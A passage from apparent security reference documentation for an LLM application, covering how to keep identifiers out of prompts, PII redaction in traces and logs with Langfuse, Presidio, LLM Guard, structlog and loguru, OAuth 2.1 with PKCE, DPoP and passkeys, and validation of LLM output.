- Log all authentication events
- Log all authorization decisions
- Log all data modifications
- Retain logs for audit period
HIPAA
- Log all access to PHI
- Log user ID, timestamp, action
- Never log PHI content in logs
Context Separation Pattern
The Problem
When identifiers appear in LLM prompts, several security issues arise:
┌─────────────────────────────────────────────────────────┐
│ WHAT HAPPENS WHEN IDs GO INTO PROMPTS │
├─────────────────────────────────────────────────────────┤
│ │
│ "Analyze document doc_abc123 for user usr_xyz789" │
│ │ │ │
│ ▼ ▼ │
│ ┌──────────────────────────────┐ │
│ │ LLM │ │
│ │ │ │
│ │ May hallucinate: │ │
│ │ - doc_abc124 (off by one) │ │
│ │ - doc_xyz789 (mixed up) │ │
│ │ - usr_other (cross-tenant) │ │
│ └──────────────────────────────┘ │
│ │
│ RISKS: │
│ • Hallucinated IDs don't exist → crashes │
│ • Mixed IDs → wrong data attribution │
│ • Cross-tenant IDs → security breach │
│ • IDs in logs/traces → data leakage │
│ │
└─────────────────────────────────────────────────────────┘

The Solution: Context Separation
┌─────────────────────────────────────────────────────────┐
│ CORRECT: CONTEXT FLOWS AROUND LLM │
├─────────────────────────────────────────────────────────┤
│ │
│ RequestContext ─────────────────────────────────────► │
│ (user_id, tenant_id, etc.) │ │
│ │ │ │
│ │ ┌──────────────────────┐ │ │
│ │ │ │ │ │
│ ▼ │ LLM │ ▼ │
│ ┌──────────┤ ├─────────────┐ │
│ │ Content │ Sees ONLY: │ Content + │ │
│ │ (text) │ - Document text │ Context │ │
│ │ │ - Query text │ (merged) │ │
│ └──────────┤ - Instructions ├─────────────┘ │
│ │ │ │
│ │ NO IDs! │ │
│ └──────────────────────┘ │
│ │
└─────────────────────────────────────────────────────────┘

Implementation
1. Define What's Forbidden
# OrchestKit parameters that NEVER go in prompts
FORBIDDEN_IN_PROMPTS = {
# User identity
"user_id", # UUID - hallucination risk
"tenant_id", # UUID - cross-tenant risk
"session_id", # String - auth context
# Resource references
"analysis_id", # UUID - job tracking
"document_id", # UUID - source tracking
"artifact_id", # UUID - output tracking
"chunk_id", # UUID - RAG reference
# System context
"trace_id", # String - observability
"request_id", # String - request tracking
"workflow_run_id", # UUID - workflow tracking
# Secrets
"api_key", # String - never!
"token", # String - never!
}

2. Separate Context from Content
from dataclasses import dataclass
from uuid import UUID
@dataclass
class ContentPayload:
"""What the LLM sees - content only"""
query: str
context_texts: list[str]
instructions: str
@dataclass
class ContextPayload:
"""What flows around the LLM - never in prompt"""
user_id: UUID
tenant_id: UUID
analysis_id: UUID
source_refs: list[UUID]
trace_id: str
async def analyze_content(
content: ContentPayload,
context: ContextPayload,
) -> AnalysisResult:
"""
Content goes TO the LLM.
Context goes AROUND the LLM.
"""
# Build prompt from content only
prompt = build_prompt(
query=content.query,
context_texts=content.context_texts,
instructions=content.instructions,
# NO context payload fields here!
)
# LLM sees content only
llm_output = await llm.generate(prompt)
# Reattach context to output
return AnalysisResult(
content=llm_output,
user_id=context.user_id, # From context
tenant_id=context.tenant_id, # From context
analysis_id=context.analysis_id, # From context
sources=context.source_refs, # From context
)

3. Audit Prompts Before Sending
import re
UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
def audit_prompt(prompt: str) -> list[str]:
"""
Check for forbidden patterns before sending to LLM.
Raises if any IDs detected.
"""
violations = []
# Check for UUIDs
if re.search(UUID_PATTERN, prompt, re.IGNORECASE):
violations.append("UUID detected in prompt")
# Check for ID field names
for forbidden in FORBIDDEN_IN_PROMPTS:
pattern = rf'\b{forbidden}\b'
if re.search(pattern, prompt, re.IGNORECASE):
violations.append(f"Forbidden field '{forbidden}' in prompt")
return violations
# Usage in prompt building
def build_safe_prompt(content: ContentPayload) -> str:
prompt = f"""
Analyze the following content:
{content.query}
Context:
{chr(10).join(content.context_texts)}
"""
# Audit before returning
violations = audit_prompt(prompt)
if violations:
raise PromptSecurityError(
f"Prompt contains forbidden content: {violations}"
)
return prompt

OrchestKit Integration Points
Content Analysis Workflow
# backend/app/workflows/agents/content_analyzer.py
async def analyze(state: AnalysisState) -> AnalysisState:
# Context is in state, but NOT passed to prompt
ctx = state.request_context
# Build content-only payload
content = ContentPayload(
query=state.analysis_request.query,
context_texts=[doc.content for doc in state.retrieved_docs],
instructions=get_analysis_instructions(),
)
# Context payload for attribution
context = ContextPayload(
user_id=ctx.user_id,
tenant_id=ctx.tenant_id,
analysis_id=state.analysis_id,
source_refs=[doc.id for doc in state.retrieved_docs],
trace_id=ctx.trace_id,
)
result = await analyze_content(content, context)
return state.with_result(result)

Common Mistakes
# ❌ BAD: ID in prompt
prompt = f"Analyze document {doc_id} for user {user_id}"
# ❌ BAD: ID in f-string
prompt = f"Context from analysis {analysis_id}:\n{context}"
# ❌ BAD: ID in instruction
prompt = f"You are analyzing for tenant {tenant_id}. Be helpful."
# ✅ GOOD: Content only
prompt = f"Analyze the following document:\n{document_content}"
# ✅ GOOD: No IDs visible
prompt = f"""
Analyze this content and provide insights:
{content}
Relevant context:
{context_texts}
"""Testing Context Separation
import pytest
class TestContextSeparation:
def test_prompt_contains_no_uuids(self):
content = ContentPayload(
query="What are the key concepts?",
context_texts=["Machine learning basics..."],
instructions="Provide clear analysis",
)
prompt = build_safe_prompt(content)
assert not re.search(UUID_PATTERN, prompt)
def test_prompt_contains_no_forbidden_fields(self):
content = ContentPayload(...)
prompt = build_safe_prompt(content)
for forbidden in FORBIDDEN_IN_PROMPTS:
assert forbidden not in prompt.lower()
def test_audit_catches_leaked_uuid(self):
bad_prompt = "Analyze doc 123e4567-e89b-12d3-a456-426614174000"
violations = audit_prompt(bad_prompt)
assert len(violations) > 0
assert "UUID" in violations[0]Langfuse Mask Callback
Langfuse Mask Callback
Pre-trace PII masking using Langfuse's mask callback for automatic redaction before data reaches the server.
Basic Setup
from langfuse import Langfuse
import re
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
}
def mask_pii(data: dict) -> dict:
"""Mask PII in Langfuse trace data before sending."""
def redact_string(value: str) -> str:
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
return value
def redact_recursive(obj):
if isinstance(obj, str):
return redact_string(obj)
elif isinstance(obj, dict):
return {k: redact_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [redact_recursive(item) for item in obj]
return obj
return redact_recursive(data)
langfuse = Langfuse(mask=mask_pii)

With Presidio
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
analyzer = AnalyzerEngine()
anonymizer = AnonymizerEngine()
def presidio_mask(data: dict) -> dict:
"""Enterprise-grade PII masking with Presidio."""
def anonymize_string(value: str) -> str:
if len(value) < 5:
return value
results = analyzer.analyze(text=value, language="en")
if results:
return anonymizer.anonymize(text=value, analyzer_results=results).text
return value
def process_recursive(obj):
if isinstance(obj, str):
return anonymize_string(obj)
elif isinstance(obj, dict):
return {k: process_recursive(v) for k, v in obj.items()}
elif isinstance(obj, list):
return [process_recursive(item) for item in obj]
return obj
return process_recursive(data)
langfuse = Langfuse(mask=presidio_mask)
LLM Guard Sanitization
Input/output sanitization for LLM pipelines using LLM Guard's Anonymize and Deanonymize scanners.
Installation
pip install llm-guard
python -m spacy download en_core_web_trf  # High-accuracy model

Basic Input Sanitization
from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import BERT_LARGE_NER_CONF
from llm_guard.vault import Vault
# Vault stores original values for deanonymization
vault = Vault()
# Initialize scanner with configuration
scanner = Anonymize(
vault=vault,
preamble="", # Text prepended to sanitized output
allowed_names=["John Doe"], # Names to NOT anonymize
hidden_names=["Acme Corp"], # Always anonymize these
recognizer_conf=BERT_LARGE_NER_CONF,
language="en"
)
def sanitize_input(prompt: str) -> tuple[str, bool, float]:
"""
Sanitize user input before sending to LLM.
Returns:
(sanitized_prompt, is_valid, risk_score)
"""
sanitized_prompt, is_valid, risk_score = scanner.scan(prompt)
return sanitized_prompt, is_valid, risk_score
# Usage
prompt = "My name is Jane Smith and my email is jane@company.com"
sanitized, valid, risk = sanitize_input(prompt)
# Result: "My name is [REDACTED_PERSON_1] and my email is [REDACTED_EMAIL_1]"Output Deanonymization
from llm_guard.output_scanners import Deanonymize
# Use the same vault from input sanitization
deanonymize_scanner = Deanonymize(vault=vault)
def deanonymize_output(sanitized_prompt: str, model_output: str) -> str:
"""
Restore original values in model output.
Args:
sanitized_prompt: The prompt that was sent to the LLM
model_output: The LLM's response
Returns:
Output with original values restored
"""
restored_output, is_valid, risk_score = deanonymize_scanner.scan(
sanitized_prompt,
model_output
)
return restored_output
# Example flow
original_prompt = "Schedule a meeting with Jane Smith at jane@company.com"
sanitized_prompt, _, _ = scanner.scan(original_prompt)
# sanitized_prompt = "Schedule a meeting with [PERSON_1] at [EMAIL_1]"
llm_response = await llm.generate(sanitized_prompt)
# llm_response = "Meeting scheduled with [PERSON_1]. Confirmation sent to [EMAIL_1]."
final_response = deanonymize_output(sanitized_prompt, llm_response)
# final_response = "Meeting scheduled with Jane Smith. Confirmation sent to jane@company.com."
Output Sensitive Data Detection
from llm_guard.output_scanners import Sensitive
# Detect PII in LLM outputs (without prior anonymization)
sensitive_scanner = Sensitive(
entity_types=["PERSON", "EMAIL_ADDRESS", "PHONE_NUMBER", "CREDIT_CARD"],
redact=True, # Replace detected PII with [REDACTED]
threshold=0.5 # Confidence threshold (0-1)
)
def check_output_for_pii(prompt: str, output: str) -> tuple[str, bool, float]:
"""
Check LLM output for leaked PII.
Returns:
(sanitized_output, is_valid, risk_score)
"""
sanitized_output, is_valid, risk_score = sensitive_scanner.scan(prompt, output)
    return sanitized_output, is_valid, risk_score
Full Pipeline Integration
from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize, Sensitive
from llm_guard.vault import Vault
from langfuse import observe, get_client
class SecureLLMPipeline:
def __init__(self):
self.vault = Vault()
self.anonymize = Anonymize(vault=self.vault, language="en")
self.deanonymize = Deanonymize(vault=self.vault)
self.sensitive_check = Sensitive(redact=True)
@observe(name="secure_llm_call")
async def process(self, user_input: str) -> str:
"""Secure LLM pipeline with full PII protection."""
# Step 1: Anonymize input
sanitized_input, input_valid, input_risk = self.anonymize.scan(user_input)
get_client().update_current_observation(
metadata={
"input_risk_score": input_risk,
"pii_detected_in_input": not input_valid
}
)
# Step 2: Call LLM with sanitized input
llm_response = await self.llm.generate(sanitized_input)
# Step 3: Check output for leaked PII
checked_output, output_valid, output_risk = self.sensitive_check.scan(
sanitized_input,
llm_response
)
# Step 4: Deanonymize for user (restore original names)
final_output = self.deanonymize.scan(sanitized_input, checked_output)[0]
get_client().update_current_observation(
metadata={
"output_risk_score": output_risk,
"pii_leaked_in_output": not output_valid
}
)
        return final_output
Configuration Options
Anonymize Scanner
from llm_guard.input_scanners import Anonymize
from llm_guard.input_scanners.anonymize_helpers import (
BERT_LARGE_NER_CONF,
BERT_BASE_NER_CONF,
DISTILBERT_NER_CONF
)
scanner = Anonymize(
vault=vault,
preamble="", # Prepend to output
allowed_names=["Claude", "GPT"], # Don't anonymize these
hidden_names=["Internal Corp"], # Always anonymize these
entity_types=[ # Entities to detect
"PERSON",
"EMAIL_ADDRESS",
"PHONE_NUMBER",
"CREDIT_CARD",
"US_SSN",
"IP_ADDRESS",
"LOCATION"
],
use_faker=True, # Replace with fake data
recognizer_conf=BERT_LARGE_NER_CONF, # NER model config
threshold=0.5, # Confidence threshold
language="en" # Language
)
Recognizer Configurations
| Config | Model | Speed | Accuracy |
|---|---|---|---|
| BERT_LARGE_NER_CONF | bert-large | Slow | Highest |
| BERT_BASE_NER_CONF | bert-base | Medium | High |
| DISTILBERT_NER_CONF | distilbert | Fast | Good |
Handling Overlapping Entities
LLM Guard handles overlapping entities automatically:
# Input: "Contact John Smith at john.smith@example.com"
# PERSON: "John Smith" (indices 8-18)
# EMAIL: "john.smith@example.com" (indices 22-45)
# - john.smith overlaps with PERSON
# LLM Guard prioritizes:
# 1. Higher confidence score wins
# 2. Longer span wins if scores are equal
Testing
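Before exercising the real scanner, the precedence policy itself can be checked with a small standalone resolver. This is an illustrative assumption about the behavior described above, not LLM Guard's internal code:

```python
from dataclasses import dataclass

@dataclass
class Span:
    start: int
    end: int
    score: float
    label: str

def resolve_overlaps(spans: list[Span]) -> list[Span]:
    """Keep non-overlapping spans: higher score wins, longer span breaks ties."""
    ordered = sorted(spans, key=lambda s: (-s.score, -(s.end - s.start)))
    kept: list[Span] = []
    for span in ordered:
        # Keep only if it does not overlap any already-kept span
        if all(span.end <= k.start or span.start >= k.end for k in kept):
            kept.append(span)
    return sorted(kept, key=lambda s: s.start)

# EMAIL overlaps PERSON; the higher-confidence EMAIL span survives
spans = [Span(8, 18, 0.85, "PERSON"), Span(14, 36, 0.99, "EMAIL_ADDRESS")]
print([s.label for s in resolve_overlaps(spans)])  # ['EMAIL_ADDRESS']
```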
import pytest
from llm_guard.input_scanners import Anonymize
from llm_guard.output_scanners import Deanonymize
from llm_guard.vault import Vault
def test_anonymization():
vault = Vault()
scanner = Anonymize(vault=vault)
test_input = "Contact John at john@example.com or 555-123-4567"
sanitized, is_valid, risk = scanner.scan(test_input)
# Verify PII is removed
assert "John" not in sanitized
assert "john@example.com" not in sanitized
assert "555-123-4567" not in sanitized
# Verify placeholders are present
assert "[PERSON" in sanitized or "REDACTED" in sanitized
def test_deanonymization():
vault = Vault()
anonymize = Anonymize(vault=vault)
deanonymize = Deanonymize(vault=vault)
original = "Send email to Alice"
sanitized, _, _ = anonymize.scan(original)
# Simulate LLM response
response = f"Email sent to {sanitized.split()[-1]}"
restored, _, _ = deanonymize.scan(sanitized, response)
assert "Alice" in restoredReferences
Logging Redaction
Logging Redaction Patterns
Pre-logging PII redaction with structlog and loguru.
Structlog Processor
import re
import structlog
from typing import Any
# Pre-compile patterns
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
"credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
"ip": re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b'),
}
def redact_pii(logger, method_name: str, event_dict: dict) -> dict:
"""
Structlog processor to redact PII from all log fields.
"""
def redact_value(value: Any) -> Any:
if isinstance(value, str):
result = value
for entity_type, pattern in PII_PATTERNS.items():
result = pattern.sub(f'[REDACTED_{entity_type.upper()}]', result)
return result
elif isinstance(value, dict):
return {k: redact_value(v) for k, v in value.items()}
elif isinstance(value, list):
return [redact_value(item) for item in value]
return value
return {k: redact_value(v) for k, v in event_dict.items()}
# Configure structlog with PII redaction
structlog.configure(
processors=[
structlog.contextvars.merge_contextvars,
structlog.processors.add_log_level,
structlog.processors.TimeStamper(fmt="iso"),
redact_pii, # Add PII redaction processor
structlog.processors.JSONRenderer()
]
)
logger = structlog.get_logger()
# Usage - PII is automatically redacted
logger.info(
"user_registered",
email="john@example.com", # -> [REDACTED_EMAIL]
phone="555-123-4567" # -> [REDACTED_PHONE]
)
Structlog with Presidio
import structlog
from presidio_analyzer import AnalyzerEngine
from presidio_anonymizer import AnonymizerEngine
# Singleton Presidio engines
_analyzer = None
_anonymizer = None
def get_presidio_engines():
global _analyzer, _anonymizer
if _analyzer is None:
_analyzer = AnalyzerEngine()
_anonymizer = AnonymizerEngine()
return _analyzer, _anonymizer
def presidio_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
"""Use Presidio for enterprise-grade PII redaction in logs."""
analyzer, anonymizer = get_presidio_engines()
def redact_value(value):
if isinstance(value, str) and len(value) > 5:
try:
results = analyzer.analyze(text=value, language="en")
if results:
anonymized = anonymizer.anonymize(
text=value,
analyzer_results=results
)
return anonymized.text
except Exception:
pass # Fallback to original on error
elif isinstance(value, dict):
return {k: redact_value(v) for k, v in value.items()}
elif isinstance(value, list):
return [redact_value(item) for item in value]
return value
return {k: redact_value(v) for k, v in event_dict.items()}
structlog.configure(
processors=[
structlog.processors.add_log_level,
structlog.processors.TimeStamper(fmt="iso"),
presidio_redact_processor,
structlog.processors.JSONRenderer()
]
)
Loguru Filter
import re
from loguru import logger
PII_PATTERNS = {
"email": re.compile(r'\b[\w.-]+@[\w.-]+\.\w{2,}\b'),
"phone": re.compile(r'\b(?:\+1[-.]?)?\(?\d{3}\)?[-.]?\d{3}[-.]?\d{4}\b'),
"ssn": re.compile(r'\b\d{3}-\d{2}-\d{4}\b'),
"credit_card": re.compile(r'\b(?:\d[ -]*?){13,19}\b'),
}
def pii_filter(record):
"""Loguru filter to redact PII from log messages."""
message = record["message"]
for entity_type, pattern in PII_PATTERNS.items():
message = pattern.sub(f'[REDACTED_{entity_type.upper()}]', message)
record["message"] = message
return True
# Configure loguru with PII filter
logger.remove() # Remove default handler
logger.add(
"logs/app.log",
filter=pii_filter,
format="{time:YYYY-MM-DD HH:mm:ss} | {level} | {message}",
serialize=True # JSON format
)
# Usage
logger.info("User john@example.com logged in from 192.168.1.1")
# Output: "User [REDACTED_EMAIL] logged in from [REDACTED_IP]"Loguru with Custom Patcher
from loguru import logger
def pii_patcher(record):
"""Patch record to redact PII in extra fields."""
if "extra" in record:
for key, value in record["extra"].items():
if isinstance(value, str):
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
record["extra"][key] = value
return record
logger = logger.patch(pii_patcher)
# Usage with bound variables
logger.bind(user_email="jane@example.com").info("Processing user request")
# The email in extra will be redacted
Field-Specific Redaction
import structlog
from typing import Any
# Fields that should always be redacted
SENSITIVE_FIELDS = {
"email", "phone", "ssn", "credit_card", "password",
"api_key", "token", "secret", "authorization"
}
# Fields that should be partially masked
PARTIAL_MASK_FIELDS = {
"user_id": lambda v: f"{str(v)[:4]}...{str(v)[-4:]}" if len(str(v)) > 8 else "***"
}
def smart_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
"""Smart redaction based on field names."""
result = {}
for key, value in event_dict.items():
key_lower = key.lower()
# Full redaction for sensitive fields
if key_lower in SENSITIVE_FIELDS:
result[key] = "[REDACTED]"
# Partial masking
elif key_lower in PARTIAL_MASK_FIELDS:
result[key] = PARTIAL_MASK_FIELDS[key_lower](value)
# Pattern-based redaction for other string fields
elif isinstance(value, str):
result[key] = redact_pii_patterns(value)
else:
result[key] = value
return result
def redact_pii_patterns(value: str) -> str:
"""Apply PII patterns to a string."""
for entity_type, pattern in PII_PATTERNS.items():
value = pattern.sub(f'[REDACTED_{entity_type.upper()}]', value)
    return value
Context Manager for Sensitive Operations
import structlog
from contextlib import contextmanager
@contextmanager
def sensitive_logging_context():
"""
Context manager that increases redaction sensitivity.
"""
# Bind a flag to indicate we're in a sensitive context
token = structlog.contextvars.bind_contextvars(
_sensitive_context=True
)
try:
yield
finally:
structlog.contextvars.unbind_contextvars("_sensitive_context")
def enhanced_redact_processor(logger, method_name: str, event_dict: dict) -> dict:
"""Enhanced redaction in sensitive contexts."""
is_sensitive = event_dict.pop("_sensitive_context", False)
if is_sensitive:
# In sensitive context, redact everything that looks like data
for key, value in event_dict.items():
if isinstance(value, str) and len(value) > 3:
event_dict[key] = "[REDACTED_SENSITIVE]"
else:
# Normal PII redaction
event_dict = redact_pii(logger, method_name, event_dict)
return event_dict
# Usage
logger = structlog.get_logger()
with sensitive_logging_context():
logger.info("processing_payment", card="4111111111111111")
    # Everything is redacted in this context
Testing Log Redaction
import pytest
import structlog
from io import StringIO
def test_pii_redaction_in_logs():
"""Verify PII is redacted from logs."""
output = StringIO()
structlog.configure(
processors=[
redact_pii,
structlog.processors.JSONRenderer()
],
logger_factory=structlog.WriteLoggerFactory(file=output)
)
logger = structlog.get_logger()
logger.info("test", email="test@example.com", ssn="123-45-6789")
log_output = output.getvalue()
assert "test@example.com" not in log_output
assert "123-45-6789" not in log_output
assert "[REDACTED_EMAIL]" in log_output
assert "[REDACTED_SSN]" in log_outputReferences
Oauth 2.1 Passkeys
OAuth 2.1 & Passkeys Reference
OAuth 2.1 Overview
OAuth 2.1 consolidates OAuth 2.0 best practices and security requirements:
Key Changes from OAuth 2.0
- PKCE required for ALL clients (not just public)
- Implicit grant removed (security vulnerability)
- Password grant removed (credential anti-pattern)
- Bearer tokens must use TLS
- Refresh token rotation mandatory
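The removed grants can be enforced with a simple guard at the token endpoint. A minimal sketch (illustrative names, no specific framework assumed):

```python
# Grant types that survive in OAuth 2.1
ALLOWED_GRANTS = {"authorization_code", "refresh_token", "client_credentials"}

def check_token_request(form: dict) -> None:
    """Reject grant types removed in OAuth 2.1 and enforce PKCE."""
    grant = form.get("grant_type")
    if grant not in ALLOWED_GRANTS:
        # 'implicit' and 'password' no longer exist in OAuth 2.1
        raise ValueError(f"unsupported_grant_type: {grant}")
    if grant == "authorization_code" and not form.get("code_verifier"):
        # PKCE is mandatory for ALL clients, confidential ones included
        raise ValueError("invalid_request: code_verifier is required")
```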
PKCE Flow (Required)
import hashlib
import base64
import secrets
def generate_pkce_pair():
"""Generate code_verifier and code_challenge for PKCE."""
# Generate random code_verifier (43-128 chars)
code_verifier = secrets.token_urlsafe(64)
# Create code_challenge using S256
digest = hashlib.sha256(code_verifier.encode()).digest()
code_challenge = base64.urlsafe_b64encode(digest).rstrip(b'=').decode()
return code_verifier, code_challenge
# Usage
verifier, challenge = generate_pkce_pair()
# Step 1: Authorization request
auth_url = f"""https://auth.example.com/authorize?
response_type=code
&client_id={client_id}
&redirect_uri={redirect_uri}
&code_challenge={challenge}
&code_challenge_method=S256
&state={state}
&scope=openid profile"""
# Step 2: Exchange code for tokens
import requests

token_response = requests.post(
"https://auth.example.com/token",
data={
"grant_type": "authorization_code",
"code": auth_code,
"redirect_uri": redirect_uri,
"client_id": client_id,
"code_verifier": verifier, # PKCE verification
}
)
Token Lifetimes (2026 Recommendations)
| Token Type | Lifetime | Storage |
|---|---|---|
| Access Token | 15 min - 1 hour | Memory only |
| Refresh Token | 7-30 days | HTTPOnly cookie / secure storage |
| ID Token | Same as access | Memory only |
DPoP (Demonstrating Proof of Possession)
Binds tokens to client cryptographic keys:
import jwt
import time
import uuid
def create_dpop_proof(http_method: str, http_uri: str, private_key) -> str:
"""Create DPoP proof for request."""
claims = {
"jti": str(uuid.uuid4()),
"htm": http_method,
"htu": http_uri,
"iat": int(time.time()),
}
    import json  # parse the JWK string returned by PyJWT's helper
    headers = {
        "typ": "dpop+jwt",
        "alg": "ES256",
        # Embed the public key as a JWK dict (requires PyJWT's 'cryptography' extra)
        "jwk": json.loads(jwt.algorithms.ECAlgorithm.to_jwk(private_key.public_key())),
    }
return jwt.encode(claims, private_key, algorithm="ES256", headers=headers)
# Usage
dpop_proof = create_dpop_proof("POST", "https://api.example.com/token", private_key)
response = requests.post(
"https://api.example.com/token",
headers={"DPoP": dpop_proof},
data={"grant_type": "refresh_token", "refresh_token": rt},
)
Passkeys / WebAuthn
Overview
Passkeys replace passwords with cryptographic credentials:
- Phishing-resistant: Bound to origin
- Passwordless: No secrets to remember
- Multi-device: Synced via platform
- Biometric: Face ID, Touch ID, fingerprint
Registration Flow
from webauthn import (
generate_registration_options,
verify_registration_response,
)
from webauthn.helpers.structs import (
AuthenticatorSelectionCriteria,
ResidentKeyRequirement,
UserVerificationRequirement,
)
# Step 1: Generate registration options
options = generate_registration_options(
rp_id="example.com",
rp_name="Example App",
user_id=user.id.encode(),
user_name=user.email,
user_display_name=user.name,
authenticator_selection=AuthenticatorSelectionCriteria(
resident_key=ResidentKeyRequirement.REQUIRED,
user_verification=UserVerificationRequirement.REQUIRED,
),
)
# Send options to client
return jsonify(options)
# Step 2: Verify registration response
verification = verify_registration_response(
credential=client_response,
expected_challenge=stored_challenge,
expected_rp_id="example.com",
expected_origin="https://example.com",
)
# Store credential
db.save_credential(
user_id=user.id,
credential_id=verification.credential_id,
public_key=verification.credential_public_key,
sign_count=verification.sign_count,
)
Authentication Flow
from webauthn import (
    generate_authentication_options,
    verify_authentication_response,
)
from webauthn.helpers.structs import PublicKeyCredentialDescriptor

# Step 1: Generate authentication options
options = generate_authentication_options(
    rp_id="example.com",
    allow_credentials=[
        PublicKeyCredentialDescriptor(id=cred.credential_id)
        for cred in user.credentials
    ],
)
# Step 2: Verify authentication response
verification = verify_authentication_response(
credential=client_response,
expected_challenge=stored_challenge,
expected_rp_id="example.com",
expected_origin="https://example.com",
credential_public_key=stored_credential.public_key,
credential_current_sign_count=stored_credential.sign_count,
)
# Update sign count (replay protection)
stored_credential.sign_count = verification.new_sign_count
db.save(stored_credential)
# Issue session/tokens
return create_session(user)
Frontend Implementation
// Registration
async function registerPasskey(options: PublicKeyCredentialCreationOptions) {
const credential = await navigator.credentials.create({
publicKey: options,
});
// Send credential to server
await fetch('/api/auth/passkey/register', {
method: 'POST',
body: JSON.stringify(credential),
});
}
// Authentication
async function authenticateWithPasskey(options: PublicKeyCredentialRequestOptions) {
const credential = await navigator.credentials.get({
publicKey: options,
});
// Send credential to server
const response = await fetch('/api/auth/passkey/authenticate', {
method: 'POST',
body: JSON.stringify(credential),
});
return response.json();
}
// Conditional UI (autofill)
if (window.PublicKeyCredential?.isConditionalMediationAvailable) {
const available = await PublicKeyCredential.isConditionalMediationAvailable();
if (available) {
// Show passkey autofill in username field
const credential = await navigator.credentials.get({
publicKey: options,
mediation: 'conditional',
});
}
}
Refresh Token Rotation
import secrets
import hashlib
from datetime import datetime, timedelta, timezone
def rotate_refresh_token(old_token: str, db) -> tuple[str, str]:
"""Rotate refresh token on use (security best practice)."""
old_hash = hashlib.sha256(old_token.encode()).hexdigest()
# Find and validate old token
token_record = db.query("""
SELECT user_id, version FROM refresh_tokens
WHERE token_hash = ? AND expires_at > NOW() AND revoked = FALSE
""", [old_hash]).fetchone()
if not token_record:
raise InvalidTokenError("Refresh token invalid or expired")
user_id, version = token_record
# Revoke old token
db.execute(
"UPDATE refresh_tokens SET revoked = TRUE WHERE token_hash = ?",
[old_hash]
)
# Create new tokens
new_access_token = create_access_token(user_id)
new_refresh_token = secrets.token_urlsafe(32)
new_hash = hashlib.sha256(new_refresh_token.encode()).hexdigest()
db.execute("""
INSERT INTO refresh_tokens (user_id, token_hash, expires_at, version)
VALUES (?, ?, ?, ?)
""", [user_id, new_hash, datetime.now(timezone.utc) + timedelta(days=7), version + 1])
    return new_access_token, new_refresh_token
Output Guardrails
Purpose
After LLM returns, validate the output before using it:
┌────────────────────────────────────────────────────────────┐
│ OUTPUT VALIDATION │
├────────────────────────────────────────────────────────────┤
│ │
│ LLM Response ──► Guardrails ──► Validated Output │
│ │ │
│ ▼ │
│ ┌────────────────┐ │
│ │ VALIDATORS │ │
│ ├────────────────┤ │
│ │ □ Schema │ Does it match expected? │
│ │ □ No IDs │ No hallucinated UUIDs? │
│ │ □ Grounded │ Supported by context? │
│ │ □ Safe │ No toxic content? │
│ │ □ Size │ Within limits? │
│ └────────────────┘ │
│ │ │
│ ┌──────────┴──────────┐ │
│ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ │
│ │ PASS │ │ FAIL │ │
│ │ │ │ │ │
│ │ Continue │ │ Retry or │ │
│ │ │ │ Error │ │
│ └──────────┘ └──────────┘ │
│ │
└────────────────────────────────────────────────────────────┘
Implementation
1. Validation Result Type
from dataclasses import dataclass
from enum import Enum
class ValidationStatus(Enum):
PASSED = "passed"
FAILED = "failed"
WARNING = "warning"
@dataclass
class ValidationResult:
status: ValidationStatus
reason: str | None = None
details: dict | None = None
@property
def is_valid(self) -> bool:
        return self.status in (ValidationStatus.PASSED, ValidationStatus.WARNING)
2. Schema Validation
from pydantic import BaseModel, ValidationError
from typing import TypeVar
T = TypeVar("T", bound=BaseModel)
def validate_schema(
llm_output: dict,
schema: type[T],
) -> tuple[T | None, ValidationResult]:
"""
Validate LLM output matches expected schema.
"""
try:
parsed = schema.model_validate(llm_output)
return parsed, ValidationResult(
status=ValidationStatus.PASSED,
)
except ValidationError as e:
return None, ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Schema validation failed: {e.error_count()} errors",
details={"errors": e.errors()},
)
# Usage
class AnalysisOutput(BaseModel):
summary: str
key_concepts: list[str]
difficulty: str
parsed, result = validate_schema(llm_response, AnalysisOutput)
if not result.is_valid:
    raise ValueError(result.reason)  # pydantic's ValidationError can't be built from a plain message
3. No Hallucinated IDs
import re
UUID_PATTERN = r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'
def validate_no_ids(output: str) -> ValidationResult:
"""
Ensure LLM didn't hallucinate any identifiers.
"""
# Check for UUIDs
uuids = re.findall(UUID_PATTERN, output, re.IGNORECASE)
if uuids:
return ValidationResult(
status=ValidationStatus.FAILED,
reason=f"Found {len(uuids)} hallucinated UUIDs",
details={"uuids": uuids},
)
# Check for ID-like patterns
id_patterns = [
r'user_id[:\s]+\S+',
r'doc_id[:\s]+\S+',
r'id[:\s]+[a-f0-9]{8,}',
]
for pattern in id_patterns:
matches = re.findall(pattern, output, re.IGNORECASE)
if matches:
return ValidationResult(
status=ValidationStatus.WARNING,
reason=f"Found ID-like pattern: {matches[0]}",
details={"matches": matches},
)
    return ValidationResult(status=ValidationStatus.PASSED)
4. Grounding Validation
def validate_grounding(
output: str,
context_texts: list[str],
threshold: float = 0.3,
) -> ValidationResult:
"""
Check if LLM output is grounded in provided context.
Uses simple keyword overlap for speed.
"""
